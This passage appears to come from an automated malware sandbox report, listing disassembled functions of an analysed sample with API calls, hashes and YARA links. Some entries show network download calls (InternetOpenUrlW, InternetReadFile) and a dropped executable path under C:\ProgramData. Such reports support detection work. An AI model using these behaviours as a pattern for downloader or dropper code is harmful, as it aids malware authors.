                                                                                                                                            • Instruction ID: 0e352be0efe34e277c7e4760dbf0677bf23d989de96f83cd80e8d90098d39d98
                                                                                                                                            • Opcode Fuzzy Hash: a7ea2927210ddaaeaf889bde27f001d99d629c740ddb3fa362963e888c4f8377
                                                                                                                                            • Instruction Fuzzy Hash: 0B615E75E00219AFCF14CFA9C8915EEFBF5EF48314B24816AE815E7340D779AE818B94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0210FB50, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0210FB8F
                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0210FC43
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                            • String ID: csm$csm
                                                                                                                                            • API String ID: 3480331319-3733052814
                                                                                                                                            • Opcode ID: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction ID: 63588798a8737f5d59e43691ced05166f198121257fcfeae593bcaa17b43ecfb
                                                                                                                                            • Opcode Fuzzy Hash: 0c3c2256af72a61df102aaf674b741db4d987c510a88555500926bfe03ab2711
                                                                                                                                            • Instruction Fuzzy Hash: CA51A134A40218DFCB38DF28C886A9E7BA5FF45314F148069D8155B691CBB6D943CF91
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02102500, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(0042BD08,00000000,00000000,00000000,00000000), ref: 021025A1
                                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 021025B3
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 021025CA
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$Open$FileRead
                                                                                                                                            • String ID: <
                                                                                                                                            • API String ID: 72386350-4251816714
                                                                                                                                            • Opcode ID: 519ad3425170169ec7a3250091affb38a33a4e4d60e286dab4301b69ad61906d
                                                                                                                                            • Instruction ID: 5070ab3ecfa79f45f551385f1af5115618f31bc53578011eb666476d47d12e78
                                                                                                                                            • Opcode Fuzzy Hash: 519ad3425170169ec7a3250091affb38a33a4e4d60e286dab4301b69ad61906d
                                                                                                                                            • Instruction Fuzzy Hash: AE410731E40119ABDB18CFA4DC94BEEB77AEF44300F508459E811A72D1DBB4AA45CF94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00413D50, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe$Fg
                                                                                                                                            • API String ID: 0-1132378746
                                                                                                                                            • Opcode ID: 568e59056c634a1779982c0bce5886467a6ccd988ea625ece9d5284e8a734255
                                                                                                                                            • Instruction ID: 9682771c9b056e9ecfe8b90a09f19d3fc3ff21ab17bd8dde71222bcf1ffa2253
                                                                                                                                            • Opcode Fuzzy Hash: 568e59056c634a1779982c0bce5886467a6ccd988ea625ece9d5284e8a734255
                                                                                                                                            • Instruction Fuzzy Hash: E1416E71A00314ABCB219F999C819EFBBB8EF85711F5000BBF50497251D6789B81CB99
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00416558, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000105,?,?,?,agA), ref: 00416591
                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000001,00000000,00000104,00000000,?,?,agA), ref: 004165C4
                                                                                                                                            • _free.LIBCMT ref: 004165E5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CurrentDirectory$_free
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2913637552-2637427811
                                                                                                                                            • Opcode ID: 26a37445114369c1d8aa249cbf9206f503b71c220dbc8e72620b9acd7afe7fa5
                                                                                                                                            • Instruction ID: 9d0f8bc13d9cd8409b4ed1e15322f7ab0248507ce056390ebc8deae956cba42f
                                                                                                                                            • Opcode Fuzzy Hash: 26a37445114369c1d8aa249cbf9206f503b71c220dbc8e72620b9acd7afe7fa5
                                                                                                                                            • Instruction Fuzzy Hash: 84014C726002147BE720AB21BC89EEB77ADDB84314F52006FF504D7085DE78DEC585A9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211891A, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: fa47b440334941d452c142b16a18679f2c4c2bd7d0f43d2425b8a78ef3cdc40c
                                                                                                                                            • Instruction ID: c82ea0785323a2aca46030ff622c1ed5df86723a32ff12a94829e931467c1932
                                                                                                                                            • Opcode Fuzzy Hash: fa47b440334941d452c142b16a18679f2c4c2bd7d0f43d2425b8a78ef3cdc40c
                                                                                                                                            • Instruction Fuzzy Hash: 7BB16A729416999FEB25CF28C8807EEBBF6EF45340F16C1BAD854AB381D3349901CB65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004186CA, Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _strrchr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                            • Opcode ID: 3a33277c20ef2f757225e29764f1ed4dd8dd423544d1de7bd7189e65f71147ea
                                                                                                                                            • Instruction ID: 560596ec7e37f14c04316295b7cb4fd2eae0d342fd8a579eee232b68144b6b6c
                                                                                                                                            • Opcode Fuzzy Hash: 3a33277c20ef2f757225e29764f1ed4dd8dd423544d1de7bd7189e65f71147ea
                                                                                                                                            • Instruction Fuzzy Hash: 7AB10272A102459FDB119F28C8817FFBBE5EF55340F2441AFE8549B341DA3C9982CB69
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0212076E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0212083E
                                                                                                                                            • _free.LIBCMT ref: 02120867
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0211CC55,00000000,021155AE,?,?,?,?,?,?,?,0211CC55,021155AE,00000000), ref: 02120899
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0211CC55,021155AE,00000000,?,?,?,?,00000000), ref: 021208B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            • Opcode ID: fe3b5957c6c2af7f62df8148c82574c5733b1df3c93794585147ec112902f231
                                                                                                                                            • Instruction ID: 56bc2164edfae3c4612e6abd1e03c51c036e9605a23e4498a1a45cbe407c7649
                                                                                                                                            • Opcode Fuzzy Hash: fe3b5957c6c2af7f62df8148c82574c5733b1df3c93794585147ec112902f231
                                                                                                                                            • Instruction Fuzzy Hash: 51419772D80625AFDB15ABB88C45B9F7777EF5C320F250234F82497290E734C9698BA1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0042051E, Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004205EE
                                                                                                                                            • _free.LIBCMT ref: 00420617
                                                                                                                                            • SetEndOfFile.KERNEL32(00000000,0041CA05,00000000,?,?,?,?,?,?,?,?,0041CA05,?,00000000), ref: 00420649
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,0041CA05,?,00000000,?,?,?,?,?), ref: 00420665
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFileLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1547350101-0
                                                                                                                                            • Opcode ID: fe3b5957c6c2af7f62df8148c82574c5733b1df3c93794585147ec112902f231
                                                                                                                                            • Instruction ID: 960fb58cf6f23020af512c85160b1bf2a67ab43dcb0f58da72c25fd8b3413fdb
                                                                                                                                            • Opcode Fuzzy Hash: fe3b5957c6c2af7f62df8148c82574c5733b1df3c93794585147ec112902f231
                                                                                                                                            • Instruction Fuzzy Hash: 6A41F872B00215ABCB11AB6ADC46BDF3AE5EF84324F540117F514D72A3D67CD8A08B6D
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00403EE0, Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetVersionExW.KERNEL32(0000011C,?,?,00000000), ref: 00403F36
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Version
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1889659487-0
                                                                                                                                            • Opcode ID: 19c065cad1cdc5bb946c3f894a42a7946f3f9623734a4f3511bb638452bc52e5
                                                                                                                                            • Instruction ID: b5cf2b7309114b8609beb7503341a49d43379c7fc9661a5a7bf876c8a635a089
                                                                                                                                            • Opcode Fuzzy Hash: 19c065cad1cdc5bb946c3f894a42a7946f3f9623734a4f3511bb638452bc52e5
                                                                                                                                            • Instruction Fuzzy Hash: 31312770D0021897DB20EF68DC4A7DEBB75EF41315F40427AE900732C1EB794A858BD9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02119F14, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02111797: _free.LIBCMT ref: 021117A5
                                                                                                                                              • Part of subcall function 0211AEEB: WideCharToMultiByte.KERNEL32(02103D40,00000000,0042CEB8,00000000,02103D40,02103D40,02117EF7,?,0042CEB8,?,00000000,?,02117C66,0000FDE9,00000000,?), ref: 0211AF8D
                                                                                                                                            • GetLastError.KERNEL32 ref: 02119F7C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02119F83
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 02119FC2
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02119FC9
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                            • Opcode ID: f624358d235691ce9a0a371fa08fb7bf6c8004fea39919ec22af2019dff57810
                                                                                                                                            • Instruction ID: d6a852f5ade70445fd788dbc30a05bce08f22ab6709ce9380cf1f5726f1968e0
                                                                                                                                            • Opcode Fuzzy Hash: f624358d235691ce9a0a371fa08fb7bf6c8004fea39919ec22af2019dff57810
                                                                                                                                            • Instruction Fuzzy Hash: 4F21927168421ABF9B24AF658C90D6FBBAEEF043647108538F93997650E731EC51CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00419CC4, Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00411547: _free.LIBCMT ref: 00411555
                                                                                                                                              • Part of subcall function 0041AC9B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00420090,?,00000000,00000000), ref: 0041AD3D
                                                                                                                                            • GetLastError.KERNEL32 ref: 00419D2C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00419D33
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00419D72
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00419D79
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 167067550-0
                                                                                                                                            • Opcode ID: 26f92bff44b00d053d218df772f4a12764ca526556509581c6e6ac8d3fe419dc
                                                                                                                                            • Instruction ID: 4d93f7510ca8fb492935d04f0bce4db79238aaac4d275d244a80cacbd3f4cc59
                                                                                                                                            • Opcode Fuzzy Hash: 26f92bff44b00d053d218df772f4a12764ca526556509581c6e6ac8d3fe419dc
                                                                                                                                            • Instruction Fuzzy Hash: 96212B712002057FDB20AF66DC809EBBBACEF44368710461EF919C7251E738ECD08BA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 021162BC, Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction ID: 2ad3dd516cae15ee854e15e85f27504978e0854664ac7929d8358243822ef25f
                                                                                                                                            • Opcode Fuzzy Hash: a029b1c59fa74e428a0cfa684141dabc8af3abb85c93389627eb59dbd1bec490
                                                                                                                                            • Instruction Fuzzy Hash: E321A571B91271ABCB318B689D81B6B766CAF01BA4F560131ED29AB290D732ED01C5E4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02116002, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,02111715,?,?,?,?,02112382,?), ref: 02116007
                                                                                                                                            • _free.LIBCMT ref: 02116064
                                                                                                                                            • _free.LIBCMT ref: 0211609A
                                                                                                                                            • SetLastError.KERNEL32(00000000,0042E0F8,000000FF,?,?,02111715,?,?,?,?,02112382,?), ref: 021160A5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: ce625cf24dc58ea9de07f82b5e61b0c3359b06124770d73b9dea0357b3156acb
                                                                                                                                            • Instruction ID: 6c61332dd819e0049bc70535d740551aa40d5e8c9b497e0e19ee8a1d11c05493
                                                                                                                                            • Opcode Fuzzy Hash: ce625cf24dc58ea9de07f82b5e61b0c3359b06124770d73b9dea0357b3156acb
                                                                                                                                            • Instruction Fuzzy Hash: D6112932781691AED67067B96C84E2B251F8BC07B57B60234F238831D0FFB78C178524
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00415DB2, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,004114C5,?,?,?,?,00412132,?), ref: 00415DB7
                                                                                                                                            • _free.LIBCMT ref: 00415E14
                                                                                                                                            • _free.LIBCMT ref: 00415E4A
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004114C5,?,?,?,?,00412132,?), ref: 00415E55
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: ce625cf24dc58ea9de07f82b5e61b0c3359b06124770d73b9dea0357b3156acb
                                                                                                                                            • Instruction ID: 21afd909f4b194fd6210441988fb04bb61b69f96b30193ecae22d5dba2614194
                                                                                                                                            • Opcode Fuzzy Hash: ce625cf24dc58ea9de07f82b5e61b0c3359b06124770d73b9dea0357b3156acb
                                                                                                                                            • Instruction Fuzzy Hash: ED11EB31700A11EA9620377A6C85EEB255587C0779776413FF538862D1ED7D8CD7412C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02116159, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,0211231C,02115737,?,?,021147F3), ref: 0211615E
                                                                                                                                            • _free.LIBCMT ref: 021161BB
                                                                                                                                            • _free.LIBCMT ref: 021161F1
                                                                                                                                            • SetLastError.KERNEL32(00000000,0042E0F8,000000FF,?,?,0211231C,02115737,?,?,021147F3), ref: 021161FC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: 7f3e5a89be83327d4d1bd293e7eec76fc70c2beab19e1d1812f8c083c576c97a
                                                                                                                                            • Instruction ID: f6b34982520b36cbc57d4c5ba4738d947c7ced5dcc3b3ef4fe7b733021ef8e77
                                                                                                                                            • Opcode Fuzzy Hash: 7f3e5a89be83327d4d1bd293e7eec76fc70c2beab19e1d1812f8c083c576c97a
                                                                                                                                            • Instruction Fuzzy Hash: 1A11C632B805517ED7616779AC80E6A256F9BC13B47B60234E128821D1EFB388174524
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00415F09, Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,004120CC,004154E7,?,?,004145A3), ref: 00415F0E
                                                                                                                                            • _free.LIBCMT ref: 00415F6B
                                                                                                                                            • _free.LIBCMT ref: 00415FA1
                                                                                                                                            • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,004120CC,004154E7,?,?,004145A3), ref: 00415FAC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2283115069-0
                                                                                                                                            • Opcode ID: 7f3e5a89be83327d4d1bd293e7eec76fc70c2beab19e1d1812f8c083c576c97a
                                                                                                                                            • Instruction ID: d0dcc7bb336abb701bcc015160c95cfd1d415a4e49015081c077152140e836e3
                                                                                                                                            • Opcode Fuzzy Hash: 7f3e5a89be83327d4d1bd293e7eec76fc70c2beab19e1d1812f8c083c576c97a
                                                                                                                                            • Instruction Fuzzy Hash: DA112C31304911EAE610267A5C81EEB2659CBC0378776023EF438822D1EE7DCCD7812C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02110264, Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction ID: 9d7c35dd9b672131847377e402bfe072b3852933830b92e97e0e3a52de465c8e
                                                                                                                                            • Opcode Fuzzy Hash: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction Fuzzy Hash: 05118231FC5225ABCB3A8B68DC44B7F7768AF09BA4B520135ED16A7290D730ED41C6E4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211684C, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,021169B1,00000000,?,0211D315,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 02116862
                                                                                                                                            • GetLastError.KERNEL32(?,0211D315,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,021169B1,00000000,00000104,?), ref: 0211686C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02116873
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2398240785-0
                                                                                                                                            • Opcode ID: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction ID: a9ead3be1897d517e417696679882bf1abc57b58cc4e9ae0495e5d2ff37ac96a
                                                                                                                                            • Opcode Fuzzy Hash: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction Fuzzy Hash: 56F01932640265BF8B246FA6DC0895AFF6EFF452A03158531A919D7520DB32E861DFD0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 021168B5, Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,021169B1,00000000,?,0211D2A0,00000000,00000000,021169B1,?,?,00000000,00000000,00000001), ref: 021168CB
                                                                                                                                            • GetLastError.KERNEL32(?,0211D2A0,00000000,00000000,021169B1,?,?,00000000,00000000,00000001,00000000,00000000,?,021169B1,00000000,00000104), ref: 021168D5
                                                                                                                                            • __dosmaperr.LIBCMT ref: 021168DC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2398240785-0
                                                                                                                                            • Opcode ID: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction ID: 1ae4143a7bedcad40eb90b3910b3479b4401927b7c439932949b33e2c5fb2aa2
                                                                                                                                            • Opcode Fuzzy Hash: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction Fuzzy Hash: A3F06D32640169BF8B241FA2DC0895AFF6DFF452A03168135E918D7520DB32E821DBE0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02120C95, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(02103D40,?,0042CEB8,00000000,02103D40,?,0211E0DF,02103D40,00000001,02103D40,02103D40,?,0211793C,00000000,?,02103D40), ref: 02120CAC
                                                                                                                                            • GetLastError.KERNEL32(?,0211E0DF,02103D40,00000001,02103D40,02103D40,?,0211793C,00000000,?,02103D40,00000000,02103D40,?,02117E90,02103D40), ref: 02120CB8
                                                                                                                                              • Part of subcall function 02120C7E: CloseHandle.KERNEL32(0042E930,02120CC8,?,0211E0DF,02103D40,00000001,02103D40,02103D40,?,0211793C,00000000,?,02103D40,00000000,02103D40), ref: 02120C8E
                                                                                                                                            • ___initconout.LIBCMT ref: 02120CC8
                                                                                                                                              • Part of subcall function 02120C40: CreateFileW.KERNEL32(0042AFE4,40000000,00000003,00000000,00000003,00000000,00000000,02120C6F,0211E0CC,02103D40,?,0211793C,00000000,?,02103D40,00000000), ref: 02120C53
                                                                                                                                            • WriteConsoleW.KERNEL32(02103D40,?,0042CEB8,00000000,?,0211E0DF,02103D40,00000001,02103D40,02103D40,?,0211793C,00000000,?,02103D40,00000000), ref: 02120CDD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                            • Opcode ID: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction ID: 0ccccebbb6028ee84ebbbecb4260a53a7cb82b0b4dcff43a26ad06849ec4dd9e
                                                                                                                                            • Opcode Fuzzy Hash: fa8bd8c12c7a88df13905f5eddcf1dd08d9ba8f59b07f20002aad9ac96aeefa0
                                                                                                                                            • Instruction Fuzzy Hash: D9F01C76640128BBCF225F96DC04A897F66FF087A1B414160FA1985130D7328875AB94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00420A45, Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteConsoleW.KERNEL32(00403AF0,?,0042CEB8,00000000,00403AF0,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0), ref: 00420A5C
                                                                                                                                            • GetLastError.KERNEL32(?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000,00403AF0,?,00417C40,00403AF0), ref: 00420A68
                                                                                                                                              • Part of subcall function 00420A2E: CloseHandle.KERNEL32(FFFFFFFE,00420A78,?,0041DE8F,00403AF0,00000001,00403AF0,00403AF0,?,004176EC,00000000,?,00403AF0,00000000,00403AF0), ref: 00420A3E
